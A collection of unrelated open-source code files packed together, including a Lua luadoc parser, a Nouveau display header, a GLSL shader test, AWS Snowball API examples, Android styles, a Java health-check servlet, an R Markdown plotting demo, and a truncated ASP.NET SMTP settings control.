table.foreachi(block.comment, function (_, line)
line = util.trim_comment(line)
local r, _, tag, text = string.find(line, "@([_%w%.]+)%s+(.*)")
if r ~= nil then
-- found new tag, add previous one, and start a new one
-- TODO: what to do with invalid tags? issue an error? or log a warning?
tags.handle(currenttag, block, currenttext)
currenttag = tag
currenttext = text
else
currenttext = util.concat(currenttext, line)
assert(string.sub(currenttext, 1, 1) ~= " ", string.format("`%s', `%s'", currenttext, line))
end
end)
tags.handle(currenttag, block, currenttext)
-- extracts summary information from the description
block.summary = parse_summary(block.description)
assert(string.sub(block.description, 1, 1) ~= " ", string.format("`%s'", block.description))
return block
end
-------------------------------------------------------------------------------
-- Parses a block of comment, started with ---. Read until the next block of
-- comment.
-- @param f file handle
-- @param line being parsed
-- @param modulename module already found, if any
-- @return line
-- @return block parsed
-- @return modulename if found
local function parse_block (f, line, modulename, first)
local block = {
comment = {},
code = {},
}
while line ~= nil do
if string.find(line, "^[\t ]*%-%-") == nil then
-- reached end of comment, read the code below it
-- TODO: allow empty lines
line, block.code, modulename = parse_code(f, line, modulename)
-- parse information in block comment
block = parse_comment(block, first)
return line, block, modulename
else
table.insert(block.comment, line)
line = f:read()
end
end
-- reached end of file
-- parse information in block comment
block = parse_comment(block, first)
return line, block, modulename
end
-------------------------------------------------------------------------------
-- Parses a file documented following luadoc format.
-- @param filepath full path of file to parse
-- @param doc table with documentation
-- @return table with documentation
function parse_file (filepath, doc)
local blocks = {}
local modulename = nil
-- read each line
local f = io.open(filepath, "r")
local i = 1
local line = f:read()
local first = true
while line ~= nil do
if string.find(line, "^[\t ]*%-%-%-") then
-- reached a luadoc block
local block
line, block, modulename = parse_block(f, line, modulename, first)
table.insert(blocks, block)
else
-- look for a module definition
modulename = check_module(line, modulename)
-- TODO: keep beginning of file somewhere
line = f:read()
end
first = false
i = i + 1
end
f:close()
-- store blocks in file hierarchy
assert(doc.files[filepath] == nil, string.format("doc for file `%s' already defined", filepath))
table.insert(doc.files, filepath)
doc.files[filepath] = {
type = "file",
name = filepath,
doc = blocks,
-- functions = class_iterator(blocks, "function"),
-- tables = class_iterator(blocks, "table"),
}
--
local first = doc.files[filepath].doc[1]
if first and modulename then
doc.files[filepath].author = first.author
doc.files[filepath].copyright = first.copyright
doc.files[filepath].description = first.description
doc.files[filepath].release = first.release
doc.files[filepath].summary = first.summary
end
-- if module definition is found, store in module hierarchy
if modulename ~= nil then
if modulename == "..." then
modulename = string.gsub (filepath, "%.lua$", "")
modulename = string.gsub (modulename, "/", ".")
end
if doc.modules[modulename] ~= nil then
-- module is already defined, just add the blocks
table.foreachi(blocks, function (_, v)
table.insert(doc.modules[modulename].doc, v)
end)
else
-- TODO: put this in a different module
table.insert(doc.modules, modulename)
doc.modules[modulename] = {
type = "module",
name = modulename,
doc = blocks,
-- functions = class_iterator(blocks, "function"),
-- tables = class_iterator(blocks, "table"),
author = first and first.author,
copyright = first and first.copyright,
description = "",
release = first and first.release,
summary = "",
}
-- find module description
for m in class_iterator(blocks, "module")() do
doc.modules[modulename].description = util.concat(
doc.modules[modulename].description,
m.description)
doc.modules[modulename].summary = util.concat(
doc.modules[modulename].summary,
m.summary)
if m.author then
doc.modules[modulename].author = m.author
end
if m.copyright then
doc.modules[modulename].copyright = m.copyright
end
if m.release then
doc.modules[modulename].release = m.release
end
if m.name then
doc.modules[modulename].name = m.name
end
end
doc.modules[modulename].description = doc.modules[modulename].description or (first and first.description) or ""
doc.modules[modulename].summary = doc.modules[modulename].summary or (first and first.summary) or ""
end
-- make functions table
doc.modules[modulename].functions = {}
for f in class_iterator(blocks, "function")() do
table.insert(doc.modules[modulename].functions, f.name)
doc.modules[modulename].functions[f.name] = f
end
-- make tables table
doc.modules[modulename].tables = {}
for t in class_iterator(blocks, "table")() do
table.insert(doc.modules[modulename].tables, t.name)
doc.modules[modulename].tables[t.name] = t
end
end
-- make functions table
doc.files[filepath].functions = {}
for f in class_iterator(blocks, "function")() do
table.insert(doc.files[filepath].functions, f.name)
doc.files[filepath].functions[f.name] = f
end
-- make tables table
doc.files[filepath].tables = {}
for t in class_iterator(blocks, "table")() do
table.insert(doc.files[filepath].tables, t.name)
doc.files[filepath].tables[t.name] = t
end
return doc
end
-------------------------------------------------------------------------------
-- Checks if the file is terminated by ".lua" or ".luadoc" and calls the
-- function that does the actual parsing
-- @param filepath full path of the file to parse
-- @param doc table with documentation
-- @return table with documentation
-- @see parse_file
function file (filepath, doc)
local patterns = { "%.lua$", "%.luadoc$" }
local valid = table.foreachi(patterns, function (_, pattern)
if string.find(filepath, pattern) ~= nil then
return true
end
end)
if valid then
logger:info(string.format("processing file `%s'", filepath))
doc = parse_file(filepath, doc)
end
return doc
end
-------------------------------------------------------------------------------
-- Recursively iterates through a directory, parsing each file
-- @param path directory to search
-- @param doc table with documentation
-- @return table with documentation
function directory (path, doc)
for f in lfs.dir(path) do
local fullpath = path .. "/" .. f
local attr = lfs.attributes(fullpath)
assert(attr, string.format("error stating file `%s'", fullpath))
if attr.mode == "file" then
doc = file(fullpath, doc)
elseif attr.mode == "directory" and f ~= "." and f ~= ".." then
doc = directory(fullpath, doc)
end
end
return doc
end
-- Recursively sorts the documentation table
local function recsort (tab)
table.sort (tab)
-- sort list of functions by name alphabetically
for f, doc in pairs(tab) do
if doc.functions then
table.sort(doc.functions)
end
if doc.tables then
table.sort(doc.tables)
end
end
end
-------------------------------------------------------------------------------
function start (files, doc)
assert(files, "file list not specified")
-- Create an empty document, or use the given one
doc = doc or {
files = {},
modules = {},
}
assert(doc.files, "undefined `files' field")
assert(doc.modules, "undefined `modules' field")
table.foreachi(files, function (_, path)
local attr = lfs.attributes(path)
assert(attr, string.format("error stating path `%s'", path))
if attr.mode == "file" then
doc = file(path, doc)
elseif attr.mode == "directory" then
doc = directory(path, doc)
end
end)
-- order arrays alphabetically
recsort(doc.files)
recsort(doc.modules)
return doc
end
|
{
"pile_set_name": "Github"
}
|
#ifndef __NV50_KMS_HEAD_H__
#define __NV50_KMS_HEAD_H__
#define nv50_head(c) container_of((c), struct nv50_head, base.base)
#include "disp.h"
#include "atom.h"
#include "lut.h"
#include "nouveau_crtc.h"
struct nv50_head {
const struct nv50_head_func *func;
struct nouveau_crtc base;
struct nv50_lut olut;
};
int nv50_head_create(struct drm_device *, int index);
void nv50_head_flush_set(struct nv50_head *, struct nv50_head_atom *);
void nv50_head_flush_clr(struct nv50_head *, struct nv50_head_atom *, bool y);
struct nv50_head_func {
void (*view)(struct nv50_head *, struct nv50_head_atom *);
void (*mode)(struct nv50_head *, struct nv50_head_atom *);
void (*olut)(struct nv50_head *, struct nv50_head_atom *);
void (*olut_set)(struct nv50_head *, struct nv50_head_atom *);
void (*olut_clr)(struct nv50_head *);
void (*core_calc)(struct nv50_head *, struct nv50_head_atom *);
void (*core_set)(struct nv50_head *, struct nv50_head_atom *);
void (*core_clr)(struct nv50_head *);
int (*curs_layout)(struct nv50_head *, struct nv50_wndw_atom *,
struct nv50_head_atom *);
int (*curs_format)(struct nv50_head *, struct nv50_wndw_atom *,
struct nv50_head_atom *);
void (*curs_set)(struct nv50_head *, struct nv50_head_atom *);
void (*curs_clr)(struct nv50_head *);
void (*base)(struct nv50_head *, struct nv50_head_atom *);
void (*ovly)(struct nv50_head *, struct nv50_head_atom *);
void (*dither)(struct nv50_head *, struct nv50_head_atom *);
void (*procamp)(struct nv50_head *, struct nv50_head_atom *);
void (*or)(struct nv50_head *, struct nv50_head_atom *);
};
extern const struct nv50_head_func head507d;
void head507d_view(struct nv50_head *, struct nv50_head_atom *);
void head507d_mode(struct nv50_head *, struct nv50_head_atom *);
void head507d_olut(struct nv50_head *, struct nv50_head_atom *);
void head507d_core_calc(struct nv50_head *, struct nv50_head_atom *);
void head507d_core_clr(struct nv50_head *);
int head507d_curs_layout(struct nv50_head *, struct nv50_wndw_atom *,
struct nv50_head_atom *);
int head507d_curs_format(struct nv50_head *, struct nv50_wndw_atom *,
struct nv50_head_atom *);
void head507d_base(struct nv50_head *, struct nv50_head_atom *);
void head507d_ovly(struct nv50_head *, struct nv50_head_atom *);
void head507d_dither(struct nv50_head *, struct nv50_head_atom *);
void head507d_procamp(struct nv50_head *, struct nv50_head_atom *);
extern const struct nv50_head_func head827d;
extern const struct nv50_head_func head907d;
void head907d_view(struct nv50_head *, struct nv50_head_atom *);
void head907d_mode(struct nv50_head *, struct nv50_head_atom *);
void head907d_olut(struct nv50_head *, struct nv50_head_atom *);
void head907d_olut_set(struct nv50_head *, struct nv50_head_atom *);
void head907d_olut_clr(struct nv50_head *);
void head907d_core_set(struct nv50_head *, struct nv50_head_atom *);
void head907d_core_clr(struct nv50_head *);
void head907d_curs_set(struct nv50_head *, struct nv50_head_atom *);
void head907d_curs_clr(struct nv50_head *);
void head907d_ovly(struct nv50_head *, struct nv50_head_atom *);
void head907d_procamp(struct nv50_head *, struct nv50_head_atom *);
void head907d_or(struct nv50_head *, struct nv50_head_atom *);
extern const struct nv50_head_func head917d;
int head917d_curs_layout(struct nv50_head *, struct nv50_wndw_atom *,
struct nv50_head_atom *);
extern const struct nv50_head_func headc37d;
#endif
|
{
"pile_set_name": "Github"
}
|
/*
** Copyright (c) 2012 The Khronos Group Inc.
**
** Permission is hereby granted, free of charge, to any person obtaining a
** copy of this software and/or associated documentation files (the
** "Materials"), to deal in the Materials without restriction, including
** without limitation the rights to use, copy, modify, merge, publish,
** distribute, sublicense, and/or sell copies of the Materials, and to
** permit persons to whom the Materials are furnished to do so, subject to
** the following conditions:
**
** The above copyright notice and this permission notice shall be included
** in all copies or substantial portions of the Materials.
**
** THE MATERIALS ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
** EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
** MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
** IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
** CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
** TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
** MATERIALS OR THE USE OR OTHER DEALINGS IN THE MATERIALS.
*/
attribute vec4 gtf_Color;
attribute vec4 gtf_Vertex;
uniform mat4 gtf_ModelViewProjectionMatrix;
varying vec4 color;
void main (void)
{
vec3 c = floor(1.5 * gtf_Color.rgb); // 1/3 true, 2/3 false
color = vec4(vec3(not(bvec3(c))), 1.0);
gl_Position = gtf_ModelViewProjectionMatrix * gtf_Vertex;
}
|
{
"pile_set_name": "Github"
}
|
{
"version": "1.0",
"examples": {
"CancelCluster": [
{
"input": {
"ClusterId": "CID123e4567-e89b-12d3-a456-426655440000"
},
"comments": {
},
"description": "This operation cancels a cluster job. You can only cancel a cluster job while it's in the AwaitingQuorum status.",
"id": "to-cancel-a-cluster-job-1482533760554",
"title": "To cancel a cluster job"
}
],
"CancelJob": [
{
"input": {
"JobId": "JID123e4567-e89b-12d3-a456-426655440000"
},
"comments": {
},
"description": "This operation cancels a job. You can only cancel a job before its JobState value changes to PreparingAppliance.",
"id": "to-cancel-a-job-for-a-snowball-device-1482534699477",
"title": "To cancel a job for a Snowball device"
}
],
"CreateAddress": [
{
"input": {
"Address": {
"City": "Seattle",
"Company": "My Company's Name",
"Country": "USA",
"Name": "My Name",
"PhoneNumber": "425-555-5555",
"PostalCode": "98101",
"StateOrProvince": "WA",
"Street1": "123 Main Street"
}
},
"output": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b"
},
"comments": {
},
"description": "This operation creates an address for a job. Addresses are validated at the time of creation. The address you provide must be located within the serviceable area of your region. If the address is invalid or unsupported, then an exception is thrown.",
"id": "to-create-an-address-for-a-job-1482535416294",
"title": "To create an address for a job"
}
],
"CreateCluster": [
{
"input": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b",
"Description": "MyCluster",
"JobType": "LOCAL_USE",
"KmsKeyARN": "arn:aws:kms:us-east-1:123456789012:key/abcd1234-12ab-34cd-56ef-123456123456",
"Notification": {
"JobStatesToNotify": [
],
"NotifyAll": false
},
"Resources": {
"S3Resources": [
{
"BucketArn": "arn:aws:s3:::MyBucket",
"KeyRange": {
}
}
]
},
"RoleARN": "arn:aws:iam::123456789012:role/snowball-import-S3-role",
"ShippingOption": "SECOND_DAY",
"SnowballType": "EDGE"
},
"output": {
"ClusterId": "CID123e4567-e89b-12d3-a456-426655440000"
},
"comments": {
},
"description": "Creates an empty cluster. Each cluster supports five nodes. You use the CreateJob action separately to create the jobs for each of these nodes. The cluster does not ship until these five node jobs have been created.",
"id": "to-create-a-cluster-1482864724077",
"title": "To create a cluster"
}
],
"CreateJob": [
{
"input": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b",
"Description": "My Job",
"JobType": "IMPORT",
"KmsKeyARN": "arn:aws:kms:us-east-1:123456789012:key/abcd1234-12ab-34cd-56ef-123456123456",
"Notification": {
"JobStatesToNotify": [
],
"NotifyAll": false
},
"Resources": {
"S3Resources": [
{
"BucketArn": "arn:aws:s3:::MyBucket",
"KeyRange": {
}
}
]
},
"RoleARN": "arn:aws:iam::123456789012:role/snowball-import-S3-role",
"ShippingOption": "SECOND_DAY",
"SnowballCapacityPreference": "T80",
"SnowballType": "STANDARD"
},
"output": {
"JobId": "JID123e4567-e89b-12d3-a456-426655440000"
},
"comments": {
},
"description": "Creates a job to import or export data between Amazon S3 and your on-premises data center. Your AWS account must have the right trust policies and permissions in place to create a job for Snowball. If you're creating a job for a node in a cluster, you only need to provide the clusterId value; the other job attributes are inherited from the cluster.",
"id": "to-create-a-job-1482864834886",
"title": "To create a job"
}
],
"DescribeAddress": [
{
"input": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b"
},
"output": {
"Address": {
"AddressId": "ADID5643ec50-3eec-4eb3-9be6-9374c10eb51b",
"City": "Seattle",
"Company": "My Company",
"Country": "US",
"Name": "My Name",
"PhoneNumber": "425-555-5555",
"PostalCode": "98101",
"StateOrProvince": "WA",
"Street1": "123 Main Street"
}
},
"comments": {
},
"description": "This operation describes an address for a job.",
"id": "to-describe-an-address-for-a-job-1482538608745",
"title": "To describe an address for a job"
}
],
"DescribeAddresses": [
{
"input": {
},
"output": {
"Addresses": [
{
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b",
"City": "Seattle",
"Company": "My Company",
"Country": "US",
"Name": "My Name",
"PhoneNumber": "425-555-5555",
"PostalCode": "98101",
"StateOrProvince": "WA",
"Street1": "123 Main Street"
}
]
},
"comments": {
},
"description": "This operation describes all the addresses that you've created for AWS Snowball. Calling this API in one of the US regions will return addresses from the list of all addresses associated with this account in all US regions.",
"id": "to-describe-all-the-addresses-youve-created-for-aws-snowball-1482538936603",
"title": "To describe all the addresses you've created for AWS Snowball"
}
],
"DescribeCluster": [
{
"input": {
"ClusterId": "CID123e4567-e89b-12d3-a456-426655440000"
},
"output": {
"ClusterMetadata": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b",
"ClusterId": "CID123e4567-e89b-12d3-a456-426655440000",
"ClusterState": "Pending",
"CreationDate": "1480475517.0",
"Description": "MyCluster",
"JobType": "LOCAL_USE",
"KmsKeyARN": "arn:aws:kms:us-east-1:123456789012:key/abcd1234-12ab-34cd-56ef-123456123456",
"Notification": {
"JobStatesToNotify": [
],
"NotifyAll": false
},
"Resources": {
"S3Resources": [
{
"BucketArn": "arn:aws:s3:::MyBucket",
"KeyRange": {
}
}
]
},
"RoleARN": "arn:aws:iam::123456789012:role/snowball-import-S3-role",
"ShippingOption": "SECOND_DAY"
}
},
"comments": {
},
"description": "Returns information about a specific cluster including shipping information, cluster status, and other important metadata.",
"id": "to-describe-a-cluster-1482864218396",
"title": "To describe a cluster"
}
],
"DescribeJob": [
{
"input": {
"JobId": "JID123e4567-e89b-12d3-a456-426655440000"
},
"output": {
"JobMetadata": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b",
"CreationDate": "1475626164",
"Description": "My Job",
"JobId": "JID123e4567-e89b-12d3-a456-426655440000",
"JobState": "New",
"JobType": "IMPORT",
"KmsKeyARN": "arn:aws:kms:us-east-1:123456789012:key/abcd1234-12ab-34cd-56ef-123456123456",
"Notification": {
"JobStatesToNotify": [
],
"NotifyAll": false
},
"Resources": {
"S3Resources": [
{
"BucketArn": "arn:aws:s3:::MyBucket",
"KeyRange": {
}
}
]
},
"RoleARN": "arn:aws:iam::123456789012:role/snowball-import-S3-role",
"ShippingDetails": {
"ShippingOption": "SECOND_DAY"
},
"SnowballCapacityPreference": "T80",
"SnowballType": "STANDARD"
}
},
"comments": {
},
"description": "This operation describes a job you've created for AWS Snowball.",
"id": "to-describe-a-job-youve-created-for-aws-snowball-1482539500180",
"title": "To describe a job you've created for AWS Snowball"
}
],
"GetJobManifest": [
{
"input": {
"JobId": "JID123e4567-e89b-12d3-a456-426655440000"
},
"output": {
"ManifestURI": "https://awsie-frosty-manifests-prod.s3.amazonaws.com/JID123e4567-e89b-12d3-a456-426655440000_manifest.bin?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20161224T005115Z&X-Amz-SignedHeaders=..."
},
"comments": {
},
"description": "Returns a link to an Amazon S3 presigned URL for the manifest file associated with the specified JobId value. You can access the manifest file for up to 60 minutes after this request has been made. To access the manifest file after 60 minutes have passed, you'll have to make another call to the GetJobManifest action.\n\nThe manifest is an encrypted file that you can download after your job enters the WithCustomer status. The manifest is decrypted by using the UnlockCode code value, when you pass both values to the Snowball through the Snowball client when the client is started for the first time.\n\nAs a best practice, we recommend that you don't save a copy of an UnlockCode value in the same location as the manifest file for that job. Saving these separately helps prevent unauthorized parties from gaining access to the Snowball associated with that job.\n\nThe credentials of a given job, including its manifest file and unlock code, expire 90 days after the job is created.",
"id": "to-get-the-manifest-for-a-job-youve-created-for-aws-snowball-1482540389246",
"title": "To get the manifest for a job you've created for AWS Snowball"
}
],
"GetJobUnlockCode": [
{
"input": {
"JobId": "JID123e4567-e89b-12d3-a456-426655440000"
},
"output": {
"UnlockCode": "12345-abcde-56789-fghij-01234"
},
"comments": {
},
"description": "Returns the UnlockCode code value for the specified job. A particular UnlockCode value can be accessed for up to 90 days after the associated job has been created.\n\nThe UnlockCode value is a 29-character code with 25 alphanumeric characters and 4 hyphens. This code is used to decrypt the manifest file when it is passed along with the manifest to the Snowball through the Snowball client when the client is started for the first time.\n\nAs a best practice, we recommend that you don't save a copy of the UnlockCode in the same location as the manifest file for that job. Saving these separately helps prevent unauthorized parties from gaining access to the Snowball associated with that job.",
"id": "to-get-the-unlock-code-for-a-job-youve-created-for-aws-snowball-1482541987286",
"title": "To get the unlock code for a job you've created for AWS Snowball"
}
],
"GetSnowballUsage": [
{
"input": {
},
"output": {
"SnowballLimit": 1,
"SnowballsInUse": 0
},
"comments": {
},
"description": "Returns information about the Snowball service limit for your account, and also the number of Snowballs your account has in use.\n\nThe default service limit for the number of Snowballs that you can have at one time is 1. If you want to increase your service limit, contact AWS Support.",
"id": "to-see-your-snowball-service-limit-and-the-number-of-snowballs-you-have-in-use-1482863394588",
"title": "To see your Snowball service limit and the number of Snowballs you have in use"
}
],
"ListClusterJobs": [
{
"input": {
"ClusterId": "CID123e4567-e89b-12d3-a456-426655440000"
},
"output": {
"JobListEntries": [
{
"CreationDate": "1480475524.0",
"Description": "MyClustrer-node-001",
"IsMaster": false,
"JobId": "JID123e4567-e89b-12d3-a456-426655440000",
"JobState": "New",
"JobType": "LOCAL_USE",
"SnowballType": "EDGE"
},
{
"CreationDate": "1480475525.0",
"Description": "MyClustrer-node-002",
"IsMaster": false,
"JobId": "JID123e4567-e89b-12d3-a456-426655440001",
"JobState": "New",
"JobType": "LOCAL_USE",
"SnowballType": "EDGE"
},
{
"CreationDate": "1480475525.0",
"Description": "MyClustrer-node-003",
"IsMaster": false,
"JobId": "JID123e4567-e89b-12d3-a456-426655440002",
"JobState": "New",
"JobType": "LOCAL_USE",
"SnowballType": "EDGE"
},
{
"CreationDate": "1480475525.0",
"Description": "MyClustrer-node-004",
"IsMaster": false,
"JobId": "JID123e4567-e89b-12d3-a456-426655440003",
"JobState": "New",
"JobType": "LOCAL_USE",
"SnowballType": "EDGE"
},
{
"CreationDate": "1480475525.0",
"Description": "MyClustrer-node-005",
"IsMaster": false,
"JobId": "JID123e4567-e89b-12d3-a456-426655440004",
"JobState": "New",
"JobType": "LOCAL_USE",
"SnowballType": "EDGE"
}
]
},
"comments": {
},
"description": "Returns an array of JobListEntry objects of the specified length. Each JobListEntry object is for a job in the specified cluster and contains a job's state, a job's ID, and other information.",
"id": "to-get-a-list-of-jobs-in-a-cluster-that-youve-created-for-aws-snowball-1482863105773",
"title": "To get a list of jobs in a cluster that you've created for AWS Snowball"
}
],
"ListClusters": [
{
"input": {
},
"output": {
"ClusterListEntries": [
{
"ClusterId": "CID123e4567-e89b-12d3-a456-426655440000",
"ClusterState": "Pending",
"CreationDate": "1480475517.0",
"Description": "MyCluster"
}
]
},
"comments": {
},
"description": "Returns an array of ClusterListEntry objects of the specified length. Each ClusterListEntry object contains a cluster's state, a cluster's ID, and other important status information.",
"id": "to-get-a-list-of-clusters-that-youve-created-for-aws-snowball-1482862223003",
"title": "To get a list of clusters that you've created for AWS Snowball"
}
],
"ListJobs": [
{
"input": {
},
"output": {
"JobListEntries": [
{
"CreationDate": "1460678186.0",
"Description": "MyJob",
"IsMaster": false,
"JobId": "JID123e4567-e89b-12d3-a456-426655440000",
"JobState": "New",
"JobType": "IMPORT",
"SnowballType": "STANDARD"
}
]
},
"comments": {
},
"description": "Returns an array of JobListEntry objects of the specified length. Each JobListEntry object contains a job's state, a job's ID, and a value that indicates whether the job is a job part, in the case of export jobs. Calling this API action in one of the US regions will return jobs from the list of all jobs associated with this account in all US regions.",
"id": "to-get-a-list-of-jobs-that-youve-created-for-aws-snowball-1482542167627",
"title": "To get a list of jobs that you've created for AWS Snowball"
}
],
"UpdateCluster": [
{
"input": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b",
"ClusterId": "CID123e4567-e89b-12d3-a456-426655440000",
"Description": "Updated the address to send this to image processing - RJ"
},
"comments": {
},
"description": "This action allows you to update certain parameters for a cluster. Once the cluster changes to a different state, usually within 60 minutes of it being created, this action is no longer available.",
"id": "to-update-a-cluster-1482863900595",
"title": "To update a cluster"
}
],
"UpdateJob": [
{
"input": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b",
"Description": "Upgraded to Edge, shipped to Finance Dept, and requested faster shipping speed - TS.",
"JobId": "JID123e4567-e89b-12d3-a456-426655440000",
"ShippingOption": "NEXT_DAY",
"SnowballCapacityPreference": "T100"
},
"comments": {
},
"description": "This action allows you to update certain parameters for a job. Once the job changes to a different job state, usually within 60 minutes of the job being created, this action is no longer available.",
"id": "to-update-a-job-1482863556886",
"title": "To update a job"
}
]
}
}
|
{
"pile_set_name": "Github"
}
|
<?xml version="1.0" encoding="utf-8" ?>
<resources>
<style name="MainTheme" parent="MainTheme.Base">
</style>
<!-- Base theme applied no matter what API -->
<style name="MainTheme.Base" parent="Theme.AppCompat.Light.DarkActionBar">
<!--If you are using revision 22.1 please use just windowNoTitle. Without android:-->
<item name="windowNoTitle">true</item>
<!--We will be using the toolbar so no need to show ActionBar-->
<item name="windowActionBar">false</item>
<!-- Set theme colors from http://www.google.com/design/spec/style/color.html#color-color-palette -->
<!-- colorPrimary is used for the default action bar background -->
<item name="colorPrimary">#2196F3</item>
<!-- colorPrimaryDark is used for the status bar -->
<item name="colorPrimaryDark">#1976D2</item>
<!-- colorAccent is used as the default value for colorControlActivated
which is used to tint widgets -->
<item name="colorAccent">#FF4081</item>
<!-- You can also set colorControlNormal, colorControlActivated
colorControlHighlight and colorSwitchThumbNormal. -->
<item name="windowActionModeOverlay">true</item>
<item name="android:datePickerDialogTheme">@style/AppCompatDialogStyle</item>
</style>
<style name="AppCompatDialogStyle" parent="Theme.AppCompat.Light.Dialog">
<item name="colorAccent">#FF4081</item>
</style>
</resources>
|
{
"pile_set_name": "Github"
}
|
/*******************************************************************************
* Copyright (c) 2019 IBM Corporation and others.
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* which accompanies this distribution, and is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* Contributors:
* IBM Corporation - initial API and implementation
*******************************************************************************/
package com.ibm.ws.microprofile.health20.internal.servlet;
import java.io.IOException;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.osgi.framework.BundleContext;
import org.osgi.framework.ServiceReference;
import com.ibm.websphere.ras.Tr;
import com.ibm.websphere.ras.TraceComponent;
import com.ibm.ws.microprofile.health20.internal.HealthCheck20Service;
import com.ibm.ws.microprofile.health20.internal.HealthCheckConstants;
public class HealthCheckReadinessServlet extends HttpServlet {
private static final long serialVersionUID = 1L;
private static final TraceComponent tc = Tr.register(HealthCheckReadinessServlet.class);
private transient HealthCheck20Service healthService = null;
private final static Logger logger = Logger.getLogger(HealthCheckReadinessServlet.class.getName(), "com.ibm.ws.microprofile.health20.resources.Health20");
/** {@inheritDoc} */
@Override
protected void service(final HttpServletRequest request, final HttpServletResponse response) throws ServletException, IOException {
findHealthService(request);
healthService.performHealthCheck(request, response, HealthCheckConstants.HEALTH_CHECK_READY);
}
/** {@inheritDoc} */
private synchronized void findHealthService(final HttpServletRequest request) throws ServletException {
if (healthService == null) {
HttpSession session = request.getSession();
ServletContext sc = session.getServletContext();
BundleContext ctxt = (BundleContext) sc.getAttribute("osgi-bundlecontext");
ServiceReference<HealthCheck20Service> ref = ctxt.getServiceReference(HealthCheck20Service.class);
if (ref == null) {
logger.log(Level.SEVERE, "healthcheck.CWMH0000E", "HealthCheckService");
throw new ServletException(Tr.formatMessage(tc, "OSGI_SERVICE_ERROR", "HealthCheckService"));
} else {
healthService = ctxt.getService(ref);
}
}
}
}
|
{
"pile_set_name": "Github"
}
|
---
title: "manipulateWidget Demo"
output: html_document
runtime: shiny
---
Hodor. Hodor hodor... Hodor hodor hodor hodor. Hodor, hodor. Hodor. Hodor, hodor, hodor. Hodor hodor?! Hodor, hodor. Hodor. Hodor, hodor - hodor hodor! Hodor, hodor, hodor. Hodor hodor hodor. Hodor. Hodor hodor - hodor... Hodor hodor hodor hodor; hodor hodor? Hodor. Hodor HODOR hodor, hodor hodor... Hodor hodor hodor; hodor hodor?! Hodor hodor - hodor hodor; hodor hodor; hodor hodor? Hodor hodor - hodor hodor... Hodor hodor hodor hodor. Hodor. Hodor hodor HODOR! Hodor HODOR hodor, hodor hodor - hodor hodor! Hodor hodor HODOR! Hodor hodor, hodor. Hodor hodor; hodor hodor; hodor hodor - hodor, hodor, hodor hodor.
```{r, echo = FALSE, message = FALSE}
library(plotly)
library(manipulateWidget)
mydata <- data.frame(x = 1:100, y = rnorm(100))
myPlot <- function(type, lwd) {
if (type == "points") {
plot_ly(mydata, x= ~x, y = ~y, type = "scatter", mode = "markers")
} else {
plot_ly(mydata, x= ~x, y = ~y, type = "scatter", mode = "lines",
line = list(width = lwd))
}
}
manipulateWidget(
myPlot(type, lwd),
type = mwSelect(c("points", "lines"), "points"),
lwd = mwSlider(1, 10, 1, .display = type == "lines"),
.height = 600
)
```
Hodor. Hodor hodor... Hodor hodor hodor hodor. Hodor, hodor. Hodor. Hodor, hodor, hodor. Hodor hodor?! Hodor, hodor. Hodor. Hodor, hodor - hodor hodor! Hodor, hodor, hodor. Hodor hodor hodor. Hodor. Hodor hodor - hodor... Hodor hodor hodor hodor; hodor hodor? Hodor. Hodor HODOR hodor, hodor hodor... Hodor hodor hodor; hodor hodor?! Hodor hodor - hodor hodor; hodor hodor; hodor hodor? Hodor hodor - hodor hodor... Hodor hodor hodor hodor. Hodor. Hodor hodor HODOR! Hodor HODOR hodor, hodor hodor - hodor hodor! Hodor hodor HODOR! Hodor hodor, hodor. Hodor hodor; hodor hodor; hodor hodor - hodor, hodor, hodor hodor.
```{r, echo = FALSE, message = FALSE}
library(plotly)
library(manipulateWidget)
mydata <- data.frame(x = 1:100, y = rnorm(100))
myPlot <- function(type, lwd) {
if (type == "points") {
plot_ly(mydata, x= ~x, y = ~y, type = "scatter", mode = "markers")
} else {
plot_ly(mydata, x= ~x, y = ~y, type = "scatter", mode = "lines",
line = list(width = lwd))
}
}
manipulateWidget(
myPlot(type, lwd),
type = mwSelect(c("points", "lines"), "points"),
lwd = mwSlider(1, 10, 1, .display = type == "lines"),
.height = 600
)
```
|
{
"pile_set_name": "Github"
}
|
<%@ Control Language="C#" AutoEventWireup="true" CodeBehind="SmtpSettings.ascx.cs" Inherits="ASC.Web.Studio.UserControls.Management.SmtpSettings" %>
<%@ Import Namespace="ASC.Core" %>
<%@ Import Namespace="Resources" %>
<div id="smtpSettingsView" class="display-none">
<div class="settings-block">
<div class="header-base clearFix"><%= Resource.SmtpSettings %></div>
<p class="smtp-settings-text"><%: Resource.SmtpSettingsText %> </p>
<div id="currentSettingsBox">
<input id="currentHost" type="hidden" value="<%= CurrentSmtpSettings.Host %>" />
<input id="currentPort" type="hidden" value="<%= CurrentSmtpSettings.Port %>" />
<input id="currentCredentialsUserName" type="hidden" value="<%= CurrentSmtpSettings.CredentialsUserName %>" />
<input id="currentCredentialsUserPassword" type="hidden" value="" />
